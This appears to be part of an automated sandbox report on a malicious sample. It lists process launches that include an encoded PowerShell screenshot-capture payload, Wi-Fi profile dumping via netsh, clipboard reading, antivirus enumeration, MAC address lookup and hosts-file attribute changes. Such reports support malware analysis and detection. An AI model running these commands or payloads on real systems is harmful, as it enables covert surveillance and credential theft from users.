                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                              Imagebase:0x7ff630ed0000
                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:netsh wlan show profile
                                                                                                                                                                                                                                                              Imagebase:0x7ff6286e0000
                                                                                                                                                                                                                                                              File size:96'768 bytes
                                                                                                                                                                                                                                                              MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                                                              Start time:04:16:09
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                                              Imagebase:0x7ff7e8150000
                                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                                                              Start time:04:16:10
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                                              Imagebase:0x7ff69bf10000
                                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                                                              Start time:04:16:11
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                                                                              Start time:04:16:12
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                                                                              Start time:04:16:14
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline"
                                                                                                                                                                                                                                                              Imagebase:0x7ff743930000
                                                                                                                                                                                                                                                              File size:2'759'232 bytes
                                                                                                                                                                                                                                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                                                                                              Start time:04:16:15
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:50
                                                                                                                                                                                                                                                              Start time:04:16:15
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:51
                                                                                                                                                                                                                                                              Start time:04:16:15
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:52
                                                                                                                                                                                                                                                              Start time:04:16:15
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:53
                                                                                                                                                                                                                                                              Start time:04:16:15
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7663.tmp" "c:\Users\user\AppData\Local\Temp\u3oq5ojt\CSCF0203E537737442CADEFC214ABE2ED32.TMP"
                                                                                                                                                                                                                                                              Imagebase:0x7ff7f34e0000
                                                                                                                                                                                                                                                              File size:52'744 bytes
                                                                                                                                                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:54
                                                                                                                                                                                                                                                              Start time:04:16:15
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                                              Imagebase:0x7ff7e8150000
                                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:55
                                                                                                                                                                                                                                                              Start time:04:16:15
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:56
                                                                                                                                                                                                                                                              Start time:04:16:15
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:57
                                                                                                                                                                                                                                                              Start time:04:16:15
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                                              Imagebase:0x7ff6241e0000
                                                                                                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:58
                                                                                                                                                                                                                                                              Start time:04:16:16
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:getmac
                                                                                                                                                                                                                                                              Imagebase:0x7ff64c960000
                                                                                                                                                                                                                                                              File size:90'112 bytes
                                                                                                                                                                                                                                                              MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:59
                                                                                                                                                                                                                                                              Start time:04:16:16
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:60
                                                                                                                                                                                                                                                              Start time:04:16:16
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
